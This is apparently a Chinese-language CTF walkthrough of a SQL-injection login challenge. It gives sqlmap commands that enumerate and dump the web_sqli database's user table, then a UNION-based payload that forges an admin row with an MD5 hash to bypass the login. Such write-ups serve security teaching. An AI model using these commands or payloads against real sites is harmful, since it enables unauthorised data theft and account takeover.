打开靶机

是一个登录框。右键看一下源码。

可以看到是以post方法传参。感觉像时间盲注。随便输入一个用户名和密码,然后bp抓包。

我们把这个页面全部复制,创建一个txt文件粘贴进去。

把这个文件托进kali里然后打开终端,用sqlmap扫描数据库。
命令:sqlmap -r /home/wz/桌面/2.txt --dbs
这个文件路径就输入你的路径。然后一路点y。

可以看到数据库为:information_schema和web_sqli。根据经验我们应该爆破第二个。命令为:
sqlmap -r /home/wz/桌面/2.txt -D web_sqli --tables

可以看到爆出的表名为:user。我们爆字段。
命令为:sqlmap -r /home/wz/桌面/2.txt -D web_sqli -T user --columns

然后我们爆数据。命令为:sqlmap -r /home/wz/桌面/2.txt -D web_sqli -T user -C id,passwd,username --dump

然后你会发现这个md5碰撞不出来。我们还得构造。
mysql在查询不存在的数据时会自动构建虚拟数据,一般数据要么明文,要么MD5;所以我们去哈希一下123得202cb962ac59075b964b07152d234b70。
我们payload: name=1'union select 1,'admin','202cb962ac59075b964b07152d234b70'#&pw=123
最后放松一下眼睛。






图片是抖音@瞳瞳
文章详细描述了如何通过sqlmap工具对一个可能存在时间盲注的登录框进行测试和利用,包括抓包、扫描数据库、爆破表名和字段,以及处理MD5碰撞的过程。
361

被折叠的 条评论
为什么被折叠?



